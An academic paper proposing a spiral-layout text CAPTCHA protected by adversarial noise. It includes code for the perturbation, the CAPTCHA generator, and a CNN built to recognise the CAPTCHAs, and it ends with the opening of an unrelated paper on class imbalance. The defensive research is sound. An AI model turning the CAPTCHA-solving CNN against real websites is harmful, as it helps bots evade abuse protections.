To improve security and reduce the breaking rate, text-based CAPTCHAs are hardened by applying distortions, noise, hollow characters, character isolation, varied-length strings, character overlapping, noise arcs, complicated backgrounds, two-layer structures, etc. [4]. However, since the deployment of deep learning models such as the convolutional neural network (CNN), they can be broken easily. Furthermore, k-nearest neighbors (KNN) and support vector machine (SVM) models can identify complicated text effectively [5–7]. Deep learning (DL) has narrowed the gap between humans and bots on such traditional problems. Due to advancements in artificial intelligence (AI), several researchers claim that DL will bring CAPTCHAs to an "end" [8]. Text-based CAPTCHAs use a simple left-to-right writing mechanism, which enables DL networks to recognize the starting point easily. Therefore, pre-processing attacks and segmentation can be performed easily.
Deep learning performs speech processing and image recognition at a level comparable with humans. However, compared with human perception, it still has an important deficiency: susceptibility to adversarial attacks. Adversarial examples are misclassified by machine learning (ML) and DL models [9]. This can be exploited to enhance CAPTCHA security, since it can lead to misclassification of the CAPTCHA by the attacker's model [10].
Based on the issues mentioned above, researchers have developed two-layer CAPTCHAs, crowding characters together, hollow schemes, etc., to overcome these security problems [7, 11]. To be considered secure, a CAPTCHA should be robust against ML and DL tools. It should also be effective against pre-processing attacks that try to remove the perturbations [12]. For this reason, CAPTCHAs evolved from text-based to image-based scenarios. The capabilities of the human visual system are exploited while designing a CAPTCHA to provide coherence in images. With the applicability of DL to image processing, security remains a major challenge [13]. DL techniques apply pre-processing that transforms color images into grayscale and removes noise from the background, and then segment the characters and compute the result [14]. Therefore, researchers concentrate on the limitations of text-based CAPTCHAs, which need to be overcome with effective and intelligent design and deployment.

1.1 Contributions of This Paper

This paper presents a text-based CAPTCHA scheme named "Spiral CAPTCHA," which uses an innovative writing mechanism and an intelligent perturbation, "immutable adversarial noise." It provides security against DL attacks in two ways: (i) by eliminating the traditional writing mechanism to avoid segmentation attacks, and (ii) by an intelligent perturbation that is robust against filtering attacks.
It is shown, by performing a CNN-based attack, that the proposed CAPTCHA is secure from DL attacks and can deceive a CNN into misrecognition. The remaining part of this paper is organized as follows: Sect. 2 describes related work. Section 3 presents the proposed work, methodology, and implementation details. Section 4 presents the performance parameters over which the proposed CAPTCHA is evaluated. Section 5 shows the results obtained after implementation. Section 6 presents the usability and security of the proposed CAPTCHA and a comparison with existing work. Section 7 provides the concluding remarks.

2 Related Work

Lee et al. [15] proposed an attack-resistant model to ensure user participation using visual secret sharing for secure human interaction. When a user fails to prove that they are human, the system aborts the process, providing security with the help of the CAPTCHA. The simulation outcomes validate the authentication accuracy among users in terms of practicability.
Hernandez-Castro et al. [16] presented an attack on human interactive proofs (HIPs) based on the puzzle-completion model of the Capy CAPTCHA, using a JPEG compression model to assess usability and stability. To overcome the shortcomings of conventional CAPTCHAs, a low-cost Joint Photographic Experts Group (JPEG) measure was used to evaluate image continuity. The experimental work attains a 65% success rate and a 20% breaking rate.

Gao et al. [17] proposed an attack to evaluate the security of the two-layer CAPTCHAs developed by Microsoft. The empirical studies demonstrate the efficiency of the proposed attack using CNN and KNN models, with a 44.6% success rate. Furthermore, they provided suggestions for developing improved CAPTCHAs with better security.
Zhu et al. [18] introduced a security model named CAPTCHA as graphical passwords, using hard AI problems to enhance online security. It is essentially a combination of a CAPTCHA and a graphical password model that also addresses several security attacks and image hotspot issues. The simulation analysis demonstrated both its usability and its security.
Beheshti et al. [19] developed a Visual Integration CAPTCHA (VICAP) model that exploits the capabilities of the Human Visual System (HVS) to combine the information available in single frames through a trans-saccadic memory technique. Moreover, it combined visual resolution to provide image continuity. Further, it ensured usability by tuning the Original-to-Random-Output ratio to 40%, and it attained a success rate of 99% with a breaking rate of 0% in the single-frame environment and 50% in the multi-frame environment.
Ogiela et al. [20] presented a visual CAPTCHA generation technique with various formats of text integrated into a persistent background. In addition, they assessed the flaws and strengths of the proposed CAPTCHA with various image detection methodologies, particularly pattern recognition models, in order to ensure security. These CAPTCHA models are applicable specifically to Cloud of Things applications. Furthermore, cognitive CAPTCHAs were also introduced to enhance security.
Khattar et al. [21] proposed a plug-n-play adversarial attack (PPAA) in which the perturbation was generated using constrained uniform random noise. They tested their approach on the Microsoft Common Objects in Context dataset using the RetinaNet object detection algorithm and achieved a 96.48% success rate.
Wang et al. [22] proposed a transfer-learning approach for attacking CAPTCHAs. This scheme reduces the attack complexity and the cost of labeling samples. The authors attacked 25 online CAPTCHA schemes and attained success rates from 36.3 to 96.9%.
Kirkbride et al. [23] presented a novel data collection technique using game-like CAPTCHAs. The collected data is used to reveal fake-account use by building a behavioral biometric. They presented game-like CAPTCHAs as a solution for generating interactive biometric data.
Noury and Rezaei [24] developed a CNN-based Deep-CAPTCHA solver to investigate design shortcomings of alphanumeric CAPTCHAs. They achieved an attack accuracy of 98.31% for alphanumerical data and 98.94% for numerical data.
Jafar et al. [25] developed an approach for predicting a brain tumor and its location using mathematical analysis and machine learning techniques, and claimed that the approach gives good accuracy and results.

Aditya et al. [26] proposed a technique to recognize sounds using convolutional neural networks and tensor deep stacking networks (TDSN). They used spectrogram images of environmental sounds for training and achieved success rates of 49 and 77% for the CNN and 56% for the TDSN.
A lot of work has been done to make text-based CAPTCHAs secure, and several researchers have successfully broken different text-based CAPTCHA schemes. It has been found that machine learning and deep learning models such as KNN and CNN are the most efficient at breaking text-based CAPTCHAs. Most text-based CAPTCHAs follow traditional writing practices, such as left-to-right layout, lack of intelligent noise, and the same fonts and colors, which makes them easy to recognize. It has also been found that adversarial perturbation plays a vital role in making a model misclassify an object in an image-based CAPTCHA and has been used to secure image-based CAPTCHAs against DL attacks. However, very little work has been done to make text-based CAPTCHAs robust against recognition attacks using adversarial perturbation. This paper presents a novel text-based writing scheme called "Spiral CAPTCHA" with an adversarial perturbation as an add-on. The proposed CAPTCHA is robust against deep learning recognition attacks.

3 Proposed Work and Methodology

In this paper, a new technique named "Spiral CAPTCHA" is proposed for writing text-based CAPTCHAs. A Spiral CAPTCHA resembles a spiral shape that starts from the center and grows radially outwards, clockwise or anticlockwise. Figure 1a shows the spiral shape, Fig. 1b shows the proposed Spiral CAPTCHA with arcs as noise, and Fig. 1c shows its resemblance to the spiral shape. It can be seen in the figure how the letters in the Spiral CAPTCHA originate from the center like a spiral and move out radially in the clockwise direction.
Fig. 1 Spiral shape, CAPTCHA, and their resemblance: (a) spiral shape, (b) Spiral CAPTCHA, (c) resemblance of Spiral CAPTCHA with spiral shape

Fig. 2 Microsoft's two-layer CAPTCHA

The Spiral CAPTCHA is perturbed with immutable adversarial noise (IAN) [10] and tested for its security against the CNN both with and without the noise. IAN uses the fast gradient sign method (FGSM) followed by a 5 × 5 median filter, applied iteratively with an increasing value of epsilon (the noise factor) until the model predicts the wrong target. FGSM computes the signed gradient of the loss with respect to the image, which is used to induce a perturbation in the input image. The main advantage of this perturbation is that a user notices little difference between the actual and the perturbed image. The noise factor is increased step-wise, and the whole image is passed through the median filter. The resulting image is passed to the CNN for prediction, and the process is repeated with an increased value of epsilon until the prediction becomes wrong. The proposed CAPTCHA is expected to provide security in two ways: first, against segmentation attacks, as it uses an unconventional writing scheme, i.e., spiral instead of left to right (the conventional layout lets a CNN easily locate the starting point of the CAPTCHA); second, through the intelligent perturbation added to the CAPTCHA, which causes the CNN to misclassify it.
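A minimal TensorFlow sketch of this iterative procedure is given below; it assumes a trained single-output Keras classifier `model` (one softmax over the label set), a float image array in [0, 1] of shape (120, 150, 1), and its one-hot `label`, and uses SciPy's median filter in place of whichever 5 × 5 median implementation the authors used. The epsilon start, step, and maximum mirror the values reported in the results, but the function names are illustrative only.

```python
import numpy as np
import tensorflow as tf
from scipy.ndimage import median_filter


def fgsm_sign(model, image, label):
    """Signed gradient of the loss w.r.t. the input image (FGSM direction)."""
    image = tf.convert_to_tensor(image[np.newaxis, ...], dtype=tf.float32)
    label = tf.convert_to_tensor(label[np.newaxis, ...], dtype=tf.float32)
    with tf.GradientTape() as tape:
        tape.watch(image)
        loss = tf.keras.losses.categorical_crossentropy(label, model(image))
    return tf.sign(tape.gradient(loss, image))[0].numpy()


def immutable_adversarial_noise(model, image, label,
                                eps_start=0.15, eps_step=0.20, eps_max=2.95):
    """Raise epsilon until the median-filtered adversarial image is misclassified."""
    direction = fgsm_sign(model, image, label)
    eps = eps_start
    adv = image
    while eps <= eps_max:
        adv = np.clip(image + eps * direction, 0.0, 1.0)
        adv = median_filter(adv, size=(5, 5, 1))          # 5x5 median, per channel
        pred = model.predict(adv[np.newaxis, ...], verbose=0)
        if np.argmax(pred) != np.argmax(label):
            return adv, eps                               # perturbation survives filtering
        eps += eps_step
    return adv, eps                                       # no misclassification within range
```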
This research is inspired by two sources: first, "Microsoft's two-layer CAPTCHA" (Fig. 2) [17], in which a six-character text CAPTCHA is written in two rows, three letters in the first row and the remaining three in the second, using a mix of hollow characters and character overlapping; and second, the "immutable adversarial noise" of Osadchy et al. [10, 17]. The proposed work has been implemented with the following step-by-step procedure:

3.1 Design of Proposed Spiral CAPTCHA

The Spiral CAPTCHA is designed in PHP with a combination of randomized fonts, angles, noise arcs, positions, colored background, alphabets, and numerals, as shown in Fig. 1b.
Fig. 3 Web layout of Spiral CAPTCHA

It is an alphanumeric CAPTCHA. A total character set of 56 characters is used: 24 uppercase and 24 lowercase English letters and 8 digits. The letters I, O, i, o and the digits 0, 1 are excluded from the design because of their homoglyph nature, i.e., their similar-looking shapes may confuse a human user when recognizing characters in the CAPTCHA. The RGB color format is used for coloring the image with the built-in functions of PHP. The image size is 150 pixels wide and 120 pixels high. Only a single color is used for writing the characters in the image, because image pre-processing converts a colored image into grayscale [4], so color loses its meaning in the very first step of image processing by a CNN. A dummy web page is created using PHP to display the CAPTCHA image and demonstrate its use, and a XAMPP server is used to host the web page locally. Figure 3 shows the web layout of the proposed CAPTCHA. As shown in the figure, users are instructed by a note below the CAPTCHA image: "Enter from center in clockwise direction." One task is left to the user: finding the center of the image. For example, in the web page shown, the CAPTCHA image reads "5VLF8P" when read from the center in the clockwise direction.
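The authors implemented the generator in PHP; purely as an illustration of the spiral layout idea, the hypothetical Python/Pillow sketch below places characters at increasing radius and angle from the image center. The font, the radius and angle steps, and the noise-arc parameters are assumptions, not the paper's actual values.

```python
import math
import random
from PIL import Image, ImageDraw, ImageFont


def spiral_captcha(text, width=150, height=120):
    """Place each character along an outward, clockwise spiral from the image center."""
    img = Image.new("RGB", (width, height), (235, 235, 250))
    draw = ImageDraw.Draw(img)
    font = ImageFont.load_default()            # any TTF font could be substituted
    cx, cy = width / 2, height / 2
    radius = 0.0
    angle = random.uniform(0.0, 2.0 * math.pi)
    for ch in text:
        x = cx + radius * math.cos(angle)
        y = cy + radius * math.sin(angle)
        draw.text((x, y), ch, fill=(20, 20, 120), font=font)
        radius += 9.0                          # move outward ...
        angle += math.radians(55)              # ... while turning clockwise (hypothetical step)
    for _ in range(3):                         # a few noise arcs, as in the described design
        xs = sorted(random.sample(range(width), 2))
        ys = sorted(random.sample(range(height), 2))
        draw.arc([xs[0], ys[0], xs[1], ys[1]], start=0, end=300, fill=(90, 90, 90))
    return img


spiral_captcha("5VLF8P").save("spiral_demo.png")
```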

3.2 Creation of Dataset

A dataset of 16,384 images in PNG format has been created. Of these, 8027 images were used for training, 3441 for validation, and the remaining 4916 for testing. Every image is saved with its characters as the label of the image, as shown in Fig. 4.

3.3 Designing CNN

Fig. 4 Spiral CAPTCHA images as dataset

Fig. 5 Proposed CNN architecture to predict Spiral CAPTCHA

Fig. 6 Prediction on dataset without perturbation

Instead of using a pre-trained network, a new AlexNet-style CNN (Fig. 5) is used, with three convolution layers, three max-pooling layers, and two fully connected layers. A single-channel input image of size 120 × 150 pixels is passed to the network. The model was run for 10 and for 50 epochs.
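The text specifies the layer counts and input size but not the filter sizes or the output encoding, so the Keras sketch below is only one plausible configuration of the described structure (three convolution layers, three max-pooling layers, two fully connected layers, single-channel 120 × 150 input). The per-character softmax over the 56-character set for a 6-character CAPTCHA is an assumption, not a detail reported in the paper.

```python
import tensorflow as tf
from tensorflow.keras import layers, models

NUM_CHARS = 6        # characters per CAPTCHA (assumption for the output head)
CHARSET_SIZE = 56    # 24 + 24 letters and 8 digits, as described above


def build_captcha_cnn():
    """AlexNet-style stack: 3 conv + 3 max-pool + 2 fully connected layers."""
    model = models.Sequential([
        layers.Input(shape=(120, 150, 1)),                 # single-channel input
        layers.Conv2D(32, (3, 3), activation="relu", padding="same"),
        layers.MaxPooling2D((2, 2)),
        layers.Conv2D(64, (3, 3), activation="relu", padding="same"),
        layers.MaxPooling2D((2, 2)),
        layers.Conv2D(128, (3, 3), activation="relu", padding="same"),
        layers.MaxPooling2D((2, 2)),
        layers.Flatten(),
        layers.Dense(512, activation="relu"),              # fully connected layer 1
        layers.Dense(NUM_CHARS * CHARSET_SIZE),            # fully connected layer 2
        layers.Reshape((NUM_CHARS, CHARSET_SIZE)),
        layers.Activation("softmax"),                      # one softmax per character
    ])
    model.compile(optimizer="adam",
                  loss="categorical_crossentropy",
                  metrics=["accuracy"])
    return model


model = build_captcha_cnn()
model.summary()
# model.fit(x_train, y_train, validation_data=(x_val, y_val), epochs=10)
```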

3.4 Training a CNN with Training Datasets and Testing It with Testing Datasets

The dataset was passed through the CNN for training, validation, and testing. We used a laptop with a 2.59 GHz Intel Core i7 processor and 4 GB of RAM, running the Windows 10 64-bit operating system. Python 3.7 was used with Keras and TensorFlow 2.1.0 as the backend. The CNN was trained on the 8027-image dataset, validated on 3441 images, and tested on randomly chosen batches of 64, 128, 256, and 512 images from the testing dataset of 4916 images. Predictions on a few images without added perturbation are shown in Fig. 6.

3.5 Adding Perturbation to Image Dataset and Testing CNN Again with Perturbed Data

The testing images are then perturbed with the IAN described in the previous section and passed to the CNN for recognition. The perturbed image and the original image look almost the same, and a user can easily recognize the image without any difficulty, but for the CNN the perturbation leads to misclassification. The image without and with perturbation can be seen in Fig. 7 for noise factors up to 2.95. A value of 1.35 (Fig. 7h) is chosen as the threshold for the proposed work, because noise above that level becomes more visible to the user and defeats the goal of being imperceptible. Figure 8 shows the predictions of the CNN on perturbed images with an epsilon value of 1.35.

Fig. 7 Image without and with perturbation: (a) plain image, (b) perturbation, (c)-(p) perturbed images with epsilon increasing from 0.35 to 2.95 in steps of 0.20

Fig. 8 Prediction on dataset with perturbation



4 Performance Parameters

The following performance metrics have been used to evaluate the performance of the proposed Spiral CAPTCHA:
a. Recognition Rate (RR): It is defined as the average percentage of individual characters recognized correctly by the CNN and is given by Eq. 1.

RR = (Nr / Nn) × 100 (1)

b. Recognition Speed (RS): It is defined as the average time to recognize an individual character and is given by Eq. 2.

RS = Ta / Nn (2)

c. Success Rate (SR): It is defined as the percentage of full CAPTCHAs recognized correctly by the CNN and is given by Eq. 3.

SR = (Nrc / N) × 100 (3)

d. Attack Speed (AS): It is defined as the total time taken to recognize a full CAPTCHA.

where
Nr: number of characters recognized correctly per CAPTCHA,
Nn: total number of characters per CAPTCHA,
Ta: time taken to recognize all characters in a CAPTCHA,
Nrc: number of CAPTCHAs recognized correctly by the CNN,
N: total number of CAPTCHAs used as the dataset.
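As a convenience, the hypothetical Python helper below computes these four measures from per-CAPTCHA ground truth, predictions, and the total recognition time for a batch; the paper does not prescribe an implementation, so the function and argument names are illustrative only, and the speeds here are averaged over the batch.

```python
def evaluate_attack(true_texts, predicted_texts, total_time):
    """Compute RR, RS, SR, and AS as defined in Eqs. 1-3 above (batch averages)."""
    n_captchas = len(true_texts)
    n_chars = sum(len(t) for t in true_texts)
    correct_chars = sum(
        sum(a == b for a, b in zip(truth, pred))
        for truth, pred in zip(true_texts, predicted_texts))
    correct_captchas = sum(t == p for t, p in zip(true_texts, predicted_texts))

    rr = 100.0 * correct_chars / n_chars          # recognition rate, Eq. 1
    rs = total_time / n_chars                     # recognition speed per character, Eq. 2
    sr = 100.0 * correct_captchas / n_captchas    # success rate, Eq. 3
    attack_speed = total_time / n_captchas        # average time per full CAPTCHA
    return rr, rs, sr, attack_speed


# Example: one 6-character CAPTCHA with one misread character
print(evaluate_attack(["5VLF8P"], ["5VLFBP"], total_time=0.006))
```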

5 Results and Discussion

Results for the proposed CAPTCHA were obtained with and without noise over the parameters mentioned in the previous section. Testing was performed on randomly permuted images from the 4916 samples, in batches of 64, 128, 256, and 512, with models trained for 10 and then 50 epochs. The following results were found:

Table 1 Results for spiral CAPTCHA without perturbation


Epochs → 10 50
Batch size → 64 128 256 512 64 128 256 512
RR % 35.42 37.63 38.48 36.91 33.33 35.94 37.04 36.75
SR % 0 0 0 0.19 0 0 0 0.19
RS (µs) 842 1807 1125 1050 798 978 1003 1063
AS (µs) 5054 10,842 6751 6298 4787 5866 6017 6378

5.1 Results for Spiral CAPTCHA without Perturbation

Table 1 shows the results for the four parameters analyzed for the images without perturbation. For both 10 and 50 epochs, all four parameters show only small variation across the batch sizes from 64 to 512. For images without perturbation, the recognition rate (RR) has a maximum value of 38.48% at 10 epochs with a 256-image batch and a minimum value of 33.33% at 50 epochs with a 64-image batch. The success rate (SR) has a maximum value of 0.19% for batch size 512 at both 10 and 50 epochs. Recognition speed (RS) and attack speed (AS) are fastest, at 798 and 4787 microseconds respectively, for batch size 64 at 50 epochs, and slowest, at 1807 and 10,842 microseconds respectively, for batch size 128 at 10 epochs.

5.2 Results for Spiral CAPTCHA with Perturbation

Table 2a shows the RR and SR results for the perturbed images. Here the minimum RR is 11.48%, obtained with batch size 64, epsilon 2.35, and 50 epochs, and the maximum is 29.82%, obtained with batch size 128, epsilon 0.15, and 10 epochs. However, we consider the effective maximum RR to be 13.50%, obtained with batch size 512, epsilon 1.35, and 10 epochs, because 1.35 is taken as the threshold value of epsilon: beyond this value the noise becomes more visible and the user can easily notice it, whereas our aim is that the noise should not be noticeable to the user. SR is 0% in all cases, which means that no perturbed CAPTCHA is recognized by the CNN. In Table 2b, RS and AS are fastest, at 802 and 4812 microseconds respectively, for batch size 64 at 50 epochs with epsilon 2.35, but we select 899 and 5395 microseconds, obtained for batch size 256 at 10 epochs with epsilon 0.95, owing to the threshold value of epsilon.

6 Usability and Security

To check the usability of the proposed CAPTCHA, a survey was performed with 130 engineering students of 3rd and 4th year along with 50 general office staff with no technical background.

Table 2 a Recognition rate and success rate for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (%) 64 128 256 512 64 128 256 512
RR Epsilon
0.15 28.65 29.82 29.36 27.60 25.78 29.30 29.69 28.81
0.35 23.96 25.52 25.59 23.57 21.88 24.74 25.85 25.26
0.55 19.27 20.96 21.42 19.99 19.01 21.61 23.05 21.10
0.75 18.23 18.75 19.47 17.90 17.71 18.88 20.77 19.86
0.95 16.93 17.06 18.03 16.47 17.45 17.06 19.21 18.36
1.15 15.63 15.49 16.02 14.84 15.63 15.50 16.99 16.70
1.35 14.32 14.19 14.45 13.50 13.80 14.20 15.49 15.40
1.55 13.97 13.45 14.09 13.05 12.77 13.64 14.75 15.03
1.75 13.23 13.65 13.95 13.40 12.25 14.14 14.40 14.57
1.95 12.85 12.64 13.90 12.52 12.91 13.57 14.88 14.33
2.15 11.90 12.41 12.20 12.47 12.87 12.27 14.85 13.12
2.35 11.67 11.74 12.96 11.76 11.48 12.29 15.48 13.43
SR 0.15 0 0 0 0 0 0 0 0
0.35 0 0 0 0 0 0 0 0
0.55 0 0 0 0 0 0 0 0
0.75 0 0 0 0 0 0 0 0
0.95 0 0 0 0 0 0 0 0
1.15 0 0 0 0 0 0 0 0
1.35 0 0 0 0 0 0 0 0
1.55 0 0 0 0 0 0 0 0
1.75 0 0 0 0 0 0 0 0
1.95 0 0 0 0 0 0 0 0
2.15 0 0 0 0 0 0 0 0
2.35 0 0 0 0 0 0 0 0
b Recognition speed and attack speed for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (µs) 64 128 256 512 64 128 256 512
RS 0.15 958 912 931 1026 1144 947 950 929
0.35 1004 947 922 981 1087 916 911 941
0.55 966 913 926 999 1282 948 909 964
0.75 990 920 942 978 1082 929 911 961
0.95 1000 925 899 937 1280 937 916 949
1.15 1013 936 928 952 1198 903 914 956
1.35 980 950 929 918 1154 916 955 957
1.55 1102 1007 897 1186 801 1098 1151 1154
1.75 988 941 929 1055 951 836 1037 878
1.95 1086 1176 960 897 961 1055 1006 996
2.15 1200 917 903 834 923 909 1132 970
2.35 1073 1077 928 1143 802 1009 803 949
AS 0.15 5748 5475 5584 6157 6866 5681 5103 5574
0.35 6022 5684 5533 5887 6527 5498 5464 5648
0.55 5797 5476 5557 5993 7690 5687 5456 5785
0.75 5942 5523 5651 5866 6494 5572 5468 5767
0.95 5998 5553 5395 5621 7682 5621 5495 5695
1.15 6077 5617 5567 5713 7188 5416 5486 5737
1.35 5882 5697 5576 5509 6927 5497 5732 5704
1.55 6612 6042 5382 7116 4806 6588 6906 6924
1.75 5928 5646 5574 6330 5706 5016 6222 5268
1.95 6516 7056 5760 5382 5766 6330 6036 5976
2.15 7200 5502 5418 5004 5538 5454 6792 5820
2.35 6438 6462 5568 6858 4812 6054 4818 5694
Note: SR 0% for all value of Epsilon and batch size show that CNN did not predict any Spiral
CAPTCHA image right. Therefore, 0% SR

Each person was asked to solve 5 randomly chosen CAPTCHAs and rate them using the statements given in Table 3. It was found that only 11% of the respondents, i.e., 19 people out of 180, found the Spiral CAPTCHA very tough to solve, while 7%, i.e., 13 people, found it very easy. Further, 28% found it easy, 22% found it normal, and 32% found it tough. The inputs obtained from the respondents indicate that the Spiral CAPTCHA is usable. Table 3 shows the survey results.

Table 3 Survey results for usability test
Statements    Percentage of people
Very easy     7
Easy          28
Normal        22
Tough         32
Very tough    11

Table 4 Attack results on different CAPTCHA schemes [4]
Website                        Success Rate (%)
Apple                          47.3
Yandex                         56.0
reCAPTCHA                      10.1
QQ                             47.2
Microsoft one-layer CAPTCHA    50.9
Wikipedia                      90.0
Sina                           75.0
PayPal                         67.4
Microsoft two-layer CAPTCHA    65.8
Weibo                          51.2
Baidu                          57.0

The security of the Spiral CAPTCHA can be seen by analyzing the results in Tables 1 and 2a, b. Both show that the success rate for recognizing the CAPTCHA is 0% in almost all cases, which indicates that the proposed CAPTCHA is robust against recognition attacks.
The Spiral CAPTCHA shows a maximum success rate of 0.19% for the images without perturbation and 0% for the images with perturbation. This shows that the spiral shape, together with the addition of IAN, makes the CAPTCHA strong enough to withstand recognition attacks. It can also be seen that the Spiral CAPTCHA is more secure than the other CAPTCHA schemes studied by Tang et al. [4], who attacked the CAPTCHA schemes of top-50 websites and attained good success rates against them. The attack success rates for the various schemes are shown in Table 4.
The lowest success rate among them is against reCAPTCHA, at 10.1%, whereas for the Spiral CAPTCHA the maximum success rate is 0.19%, for the images without perturbation. Hence, the Spiral CAPTCHA is considered more secure than the presently available CAPTCHA schemes. Designing the CAPTCHA with a spiral shape and adding intelligent perturbation therefore makes it robust against recognition attacks.

7 Concluding Remarks

A novel CAPTCHA writing scheme called Spiral CAPTCHA has been presented, which is further perturbed with IAN. A dataset of 16,384 images in PNG format was created, of which 8027 images were used for training, 3441 for validation, and the remaining 4916 for testing. The maximum recognition rate achieved for the CAPTCHA without perturbation is 38.48%, and with perturbation at the chosen threshold epsilon it is 13.50%. The success rate is very low (almost 0%) in both cases, i.e., 0.19% for images without perturbation and 0% for images with perturbation, so the CNN's prediction of the full CAPTCHA is wrong almost all of the time. The maximum recognition rate is also small, at 38.48% for images without perturbation and 29.82% with perturbation, which means that on average only one or two characters are recognized correctly in a CAPTCHA. Hence, it is demonstrated that the proposed Spiral CAPTCHA is robust against recognition attacks and is practically usable.

References

1. Ahn Von, L., Blum, M., Hopper, N. J., & Langford, J. (2003). CAPTCHA: Using hard AI
problems for security. In Advances in Cryptology—EUROCRYPT 2003 (pp 294–311)
2. Bursztein, E., Martin, M., & Mitchell, J. (2011). Text-based CAPTCHA strengths and weak-
nesses. In Proceedings 18th ACM Conference Computer Communication Security—CCS 11,
(pp 125).
3. Lee, L. Y., & Hsu, H. C. (2011). Usability study of text-based CAPTCHAs. In Displays (pp
81–86).
4. Tang, M., Gao, H., Zhang, Y., Liu, Y., Zhang, P., & Wang, P. (2018). Research on deep
learning techniques in breaking text-based Captchas and designing image-based Captcha. IEEE
Transactions on Information Forensics and Security, 2522–2537.
5. Yan, J., Salah, A., & Ahmad, E. (2011). Captcha perspective. In Computer (pp 54–60).
6. Yan, J., & Ahmad El, S. A. (2009). CAPTCHA security: A case study. IEEE Security & Privacy,
22–28.
7. Chalil, K., Greenstein, S. J., & Horan, K. (2019). International journal of industrial ergonomics
empirical studies to investigate the usability of text- and image-based CAPTCHAs. Interna-
tional Journal of Industrial Ergonomics, 200–208.
8. Bursztein, E., Aigrain, J., Moscicki, A., & Mitchell, C. J. (2014). The end is nigh: Generic
solving of text-based CAPTCHAs. In Usenix Woot (pp. 3).
9. Szegedy, C., Bruna, J., Erhan, D., & Goodfellow, I. (2014). Intriguing properties of neural
networks. In arXiv:1312.6199[cs.CV] (pp. 1–10).
10. Osadchy, M., Hernandez-Castro, J., Gibson, S., Dunkelman, O., & Perez-Cabo, D. (2017).
No bot expects the deep CAPTCHA! Introducing immutable adversarial examples, with
applications to CAPTCHA generation. Transactions on Information Forensics and Security,
2640–2653.
11. Lin, D., Lin, F., Lv, Y., Cai, F., & Cao, D. (2018). Chinese character CAPTCHA recognition
and performance estimation via deep neural network. Neurocomputing, 11–19.
12. Roshanbin, N., & Miller, J. (2016). ADAMAS: Interweaving unicode and color to enhance
CAPTCHA security. Future Generation Computer Systems, 289–310.
13. Nguyen, D. V., Chow, W. Y., & Susilo, W. (2014) On the security of text-based 3D CAPTCHAs.
Computer & Security, 84–99.
14. Schryen, G., Wagner, G., & Schlegel, A. (2016). Development of two novel face-recognition
CAPTCHAs: A security and usability study. Computers & security, 95–116.
15. Lee, S. J., & Hsieh, H. M. (2013). Preserving user-participation for insecure network
communications with CAPTCHA and visual secret sharing technique. IET Networks, 81–91.
16. Hernandez-Castro, J. C., Moreno, R. D. M., & Barrero, F. D. (2015). Using JPEG to measure
image continuity and break capy and other puzzle CAPTCHAs. IEEE Internet Computing,
46–53.
17. Gao, H., Tang, M., Liu, Y., Zhang, P., & Liu, X. (2017). Research on the security of microsoft’s
two-layer Captcha. Transactions on Information Forensics and Security, 1671–1685.

18. Zhu, B. B., Yan, J., Bao, G., Yang, M., & Xu, N. (2014). Captcha as graphical passwords—A
new security primitive based on hard AI problems. Transactions on Information Forensics and
Security, 891–904.
19. Beheshti, S. R. M. S., Liatsis, P., & Rajarajan, M. (2017). A CAPTCHA model based on visual
psychophysics: Using the brain to distinguish between human users and automated computer
bots. In Computers & security, 596–617.
20. Ogiela, R. M., Krzyworzeka, N., & Ogiela, L. (2018). Application of knowledge-based cogni-
tive CAPTCHA in cloud of things security. In Concurrency and Computation: Practice and
Experience, 30, e4769. https://doi.org/10.1002/cpe.4769
21. Khattar, S., & Rama Krishna, C. (2020). Adversarial attack to fool object detector. Journal of
Discrete Mathematical Sciences and Cryptography, 547–562.
22. Wang, P., Gao, H., Shi, Z., Yuan, Z., & Hu, J. (2020). Simple and easy: Transfer learning-based
attacks to text CAPTCHA. IEEE Access, 1–1.
23. Kirkbride, P., Dewan, A. A. M., & Lin, F. (2020). Game-like Captchas for intrusion detection
game-like Captchas for intrusion detection. In International Conference on Cyber Science and
Technology Congress (pp. 312–315).
24. Noury, Z., & Rezaei, M. (2020). Deep-CAPTCHA: A deep learning based CAPTCHA solver
for vulnerability assessment. arXiv:2006.08296
25. Jafar, A. A., Ambeshwar, K., Omar, A. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 267–272.
26. Aditya, K., Deepak, G., Nhu, G. N., Ashish, K., Babita, P., & Prayag, T. (2019). Sound clas-
sification using convolutional neural network and tensor deep stacking network. IEEE Access,
7717–7727.
Predicting Classifiers Efficacy in Relation
with Data Complexity Metric Using
Under-Sampling Techniques

Deepika Singh, Anju Saha, and Anjana Gosain

Abstract In imbalanced classification tasks, the training datasets may also suffer from other problems such as class overlapping, small disjuncts, and classes of low density. In such situations, learning for the minority class is imprecise. Data complexity metrics help us to identify the relationship between a classifier's learning accuracy and the dataset characteristics. This paper presents an experimental study for imbalanced datasets in which the dwCM complexity metric is used to group the datasets by complexity level, and the behavior of under-sampling-based pre-processing techniques is then analyzed for these different groups of datasets. Experiments are conducted on 22 real-life datasets with different levels of imbalance, class overlapping, and class density. The experimental results show that the groups formed using the dwCM metric can better explain the difficulty of imbalanced datasets and help in predicting the response of the classifiers to the under-sampling algorithms.

Keywords Class imbalance · Data complexity metric · Sampling techniques ·


Under-sampling · Over-sampling

1 Introduction

A vital issue that has been widely acknowledged in the machine learning community is that of skewed datasets, that is, datasets in which the number of samples of one class (called the majority class) greatly outnumbers the number of samples in the other class(es) (called the minority class). Such skewed datasets are referred to as imbalanced datasets, and the problem is thus called the class imbalance problem. The class imbalance problem causes difficulty for many classification algorithms, since the classifiers are often biased toward the majority class [1]. Many methods have been proposed to deal with this problem [2–9]. However, studies suggest that class imbalance is not the only cause of the significant degradation of performance on individual classes; there are certain other internal factors of the dataset that, when they occur together with class imbalance, can

D. Singh (B) · A. Saha · A. Gosain


USICT, Guru Gobind Singh Indraprastha University, New Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_7

lead to a serious drop in classifier accuracy, especially for the minority class. These internal difficulty factors are small disjuncts, small dataset size, overlap between the minority and majority classes, and poor class separability. Recently, researchers have started using data complexity metrics to describe the difficulty factors of datasets in classification problems [10–18]. These data complexity metrics try to quantify different aspects or sources of data particularities that are considered difficult for the classification task [10].
